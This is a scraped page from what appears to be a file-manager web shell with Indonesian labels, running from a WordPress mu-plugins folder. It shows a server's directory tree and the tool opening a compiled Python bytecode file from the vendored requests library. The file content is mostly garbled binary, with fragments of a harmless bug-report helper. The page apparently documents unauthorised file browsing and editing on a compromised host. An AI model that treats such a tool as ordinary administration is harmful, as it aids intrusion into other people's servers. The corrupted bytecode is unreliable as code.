📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
lib
›
python3.9
›
site-packages
›
oci
›
_vendor
›
requests
›
📁 __pycache__
📍
Lokasi:
/usr/lib/python3.9/site-packages/oci/_vendor/requests/__pycache__
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: help.cpython-39.pyc
a ���fS � @ s d Z ddlmZ ddlZddlZddlZddlZddlmZ ddlm Z ddlm Z ddlmZ zddlZW n ey� dZY n0 zddl Z W n ey� dZ Y n0 zdd lmZ W n ey� dZdZdZY n0 ddlZddlZd d� Zdd � Zdd� Zedk�re� dS )z'Module containing bug report helper(s).� )�print_functionN)�idna)�urllib3)�chardet� )�__version__)� pyopensslc C s� t �� } | dkrt �� }nj| dkr\dtjjtjjtjjf }tjjdkr�d� |tjjg�}n(| dkrnt �� }n| dkr�t �� }nd}| |d �S ) a� Return a dict with the Python implementation and version. Provide both the name and the version of the Python implementation currently running. For example, on CPython 2.7.5 it will return {'name': 'CPython', 'version': '2.7.5'}. This function works best on CPython and PyPy: in particular, it probably doesn't work for Jython or IronPython. Future investigation should be done to work out the correct shape of the code for those platforms. ZCPythonZPyPyz%s.%s.%s�final� ZJythonZ IronPython�Unknown)�name�version) �platformZpython_implementationZpython_version�sysZpypy_version_info�major�minor�micro�releaselevel�join)�implementationZimplementation_version� r �=/usr/lib/python3.9/site-packages/oci/_vendor/requests/help.py�_implementation) s$ �� r c C s� zt �� t �� d�} W n ty2 ddd�} Y n0 t� }dtji}ddi}ddi}trbdtji}trpdtji}ddd�}t r�t jdt j j d�}dtt dd�i}dttdd�i}tj}d|dur�d| ndi} | || tdutdu ||||||dtid �S ) z&Generate information for a bug report.)�system�releaser r Nr )r Zopenssl_versionz%xr )r r � system_sslZusing_pyopensslZusing_charset_normalizerZ pyOpenSSLr r �charset_normalizer�cryptographyr Zrequests)r r r �IOErrorr r r r r �OpenSSLZSSLZOPENSSL_VERSION_NUMBER�getattrr r �sslr �requests_version) Z platform_infoZimplementation_infoZurllib3_infoZcharset_normalizer_infoZchardet_infoZpyopenssl_infoZcryptography_infoZ idna_infor Zsystem_ssl_infor r r �infoJ sX � � � ������r# c C s t tjt� ddd�� dS )z)Pretty-print the bug information as JSON.T� )Z sort_keys�indentN)�print�json�dumpsr# r r r r �main� s r) �__main__)�__doc__Z __future__r r'